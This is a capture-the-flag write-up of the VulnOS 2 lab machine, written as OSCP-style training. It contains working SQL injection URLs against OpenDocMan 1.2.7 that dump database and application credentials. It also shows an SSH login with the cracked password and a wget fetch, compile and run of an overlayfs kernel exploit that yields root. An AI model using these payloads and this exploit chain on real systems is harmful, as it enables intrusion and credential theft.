Introduction

Continuing our series of write-ups for OSCP-like VulnHub boxes, today we’ll tackle the VulnOS 2 virtual machine.

VulnOS 2 is an Ubuntu box running SSH, HTTP, and, interestingly, an IRC daemon. To get root, we’ll need to enumerate the webserver to find a classic SQL injection vulnerability. We’ll then use the SQLi to capture credentials and log in over SSH. Finally on the system, some basic enumeration will lead us to a kernel exploit to pop a root shell.

---

Description

The author’s description of this box is short and sweet:

Your assignment is to pentest a company website, get root of the system and read the final flag

---

Host Discovery

Before we can begin our reconnaissance, we need to know where the target lives. We’ll use Arp-scan.

(ori0n@apophis) --> [ ~/vulnos ]
  ==> sudo arp-scan -l
[sudo] password for ori0n:
Interface: ens33, type: EN10MB, MAC: 00:0c:29:8d:fb:0b, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1       00:50:56:c0:00:08       VMware, Inc.
10.0.10.2       00:50:56:fb:3b:27       VMware, Inc.
10.0.10.11      00:0c:29:e2:a7:d8       VMware, Inc.
10.0.10.125     00:0c:29:46:0a:c0       VMware, Inc.
10.0.10.199     00:50:56:fa:5e:2b       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.018 seconds (126.86 hosts/sec). 5 responded

Our target is at 10.0.10.125. I’ll add an entry in /etc/hosts.

10.0.10.125        vulnos

---

Scanning

We’ll run a port scan to see what ports the VulnOS machine has listening for us. RustScan will do the trick.

(ori0n@apophis) --> [ ~/vulnos ]
  ==> rustscan -a vulnos -- -sV -oA scans/nmap-version
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.125:22
Open 10.0.10.125:80
Open 10.0.10.125:6667
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-version" on ip 10.0.10.125
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 17:59 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 17:59
Scanning 10.0.10.125 [2 ports]
Completed Ping Scan at 17:59, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 17:59
Scanning vulnos (10.0.10.125) [3 ports]
Discovered open port 22/tcp on 10.0.10.125
Discovered open port 80/tcp on 10.0.10.125
Discovered open port 6667/tcp on 10.0.10.125
Completed Connect Scan at 17:59, 0.00s elapsed (3 total ports)
Initiating Service scan at 18:00
Scanning 3 services on vulnos (10.0.10.125)
Completed Service scan at 18:00, 11.03s elapsed (3 services on 1 host)
NSE: Script scanning 10.0.10.125.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Nmap scan report for vulnos (10.0.10.125)
Host is up, received syn-ack (0.00042s latency).
Scanned at 2021-08-11 17:59:59 CDT for 12s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open  irc     syn-ack ngircd
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds

It looks like we have the standard SSH and HTTP servers as well as an IRC daemon running on the box. We’ll start by enumerating HTTP.

---

Enumerating the Web Server

Fire up a browser and navigate to http://vulnos/. The index page directs us to the /jabc directory, so follow the link to head there.

After poking around the site for a minute, we land on the ‘Documentation’ page, which appears to contain a whole lot of nothing. But trying to highlight the page reveals some “hidden” text.

So we learn of another application running on the server and get some guest credentials to boot. Let’s have a look at this /jabcd0cs directory.

We find the version number at the bottom. Perhaps SearchSploit will know something about this app?

(ori0n@apophis) --> [ ~/vulnos ]
  ==> searchsploit opendocman 1.2.7
-------------------------------------------- -----------------------
 Exploit Title                              |  Path
-------------------------------------------- -----------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities | php/webapps/32075.txt
-------------------------------------------- -----------------------
Shellcodes: No Results

So there is an SQL injection vulnerability in the ajax_udf.php page. We are given a proof of concept. Let’s adjust the URL to our target host and verify the bug:
http://vulnos/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

We see the MySQL version string displayed in the drop-down box. It works!

Let’s try to dump the usernames and passwords from the mysql.user table.

http://vulnos/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(user,0x3a,password),3,4,5,6,7,8,9%20from%20mysql.user

Cleaning these up and feeding them to CrackStation gives us the password toor for three users.

Trying these over SSH, however, yields nothing.

---

Getting a Foothold

Moving on, let’s try to dump the OpenDocMan credentials. We can already determine from our exploit URL that the OpenDocMan users table is called odm_user. Instead of trying to enumerate the table schema, search the GitHub repo for odm_user. Bingo! We find the database.sql file with the schema:

CREATE TABLE odm_user (
  id int(11) unsigned NOT NULL auto_increment,
  username varchar(25) NOT NULL default '',
  password varchar(50) NOT NULL default '',
  department int(11) unsigned default NULL,
  phone varchar(20) default NULL,
  Email varchar(50) default NULL,
  last_name varchar(255) default NULL,
  first_name varchar(255) default NULL,
  pw_reset_code char(32) default NULL,
  can_add tinyint(1) NULL DEFAULT 1,
  can_checkin tinyint(1) NULL DEFAULT 1,
  PRIMARY KEY  (id)
) ENGINE = MYISAM;

Now let’s modify our SQLi to dump the username and password fields of this table:

http://vulnos/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9%20from%20odm_user

We can try to crack the webmin hash with CrackStation, but no luck this time. Let’s try Hashes.com instead.

So we’ve seen the webmin user twice now. Maybe he has an SSH account?

(ori0n@apophis) --> [ ~/vulnos ]
  ==> ssh webmin@vulnos
webmin@vulnos's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 2.0

Last login: Wed May  4 10:41:07 2016
$

And we’re in! 😉

---

Privilege Escalation – On To Root

Now that we have a shell on the target, the first thing we should do is determine which distro and kernel we are running.

$ cat /proc/version && cat /etc/*release
Linux version 3.13.0-24-generic (buildd@komainu) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS"
NAME="Ubuntu"
VERSION="14.04.4 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.4 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

We’re on Ubuntu 14.04.4 running kernel version 3.13.0-24-generic. Off to trusty SearchSploit to see if we’ll have an easy path to root.

( ori0n@apophis ) : [ ~ ]
  ==> searchsploit ubuntu 14.04 3.13 | grep -v 'x86.64'
--------------------------------------------------------------------------------------------------------------------- -----------------------
 Exploit Title                                                                                                       |  Path
--------------------------------------------------------------------------------------------------------------------- -----------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation                 | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/sh | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2)                                      | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free                                                 | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                                        | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                               | linux/local/44298.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR /  | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation                               | linux/local/41760.txt
--------------------------------------------------------------------------------------------------------------------- -----------------------
Shellcodes: No Results

Let’s try the first hit. I’ll locate this source file on GitHub to pull it directly down to the victim.

$ cd /tmp
$ wget https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/overlayfs/ofs_32.c
--2021-08-12 02:55:09--  https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/overlayfs/ofs_32.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: ‘ofs_32.c’

100%[=================================================================>] 5,123       --.-K/s   in 0s

2021-08-12 02:55:10 (33.0 MB/s) - ‘ofs_32.c’ saved [5123/5123]

Reading from the source, this looks like a straightforward build. Let’s try to compile and run.

$ gcc -o ofs ofs_32.c
$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)

And rooted! 😉

We have one final order of business: find the flag. This is typically found in the /root directory, so head over and see what we can find.

# cd /root
# ls -l
total 4
-rw-r--r-- 1 root root 165 May  4  2016 flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

---

Wrapping Up

VulnOS 2 ended up being a relatively simple box that required simple enumeration and a few classics: SQL injection and kernel exploitation. The path was fairly straightforward if you read between the lines a bit and performed standard enumeration once getting shell access.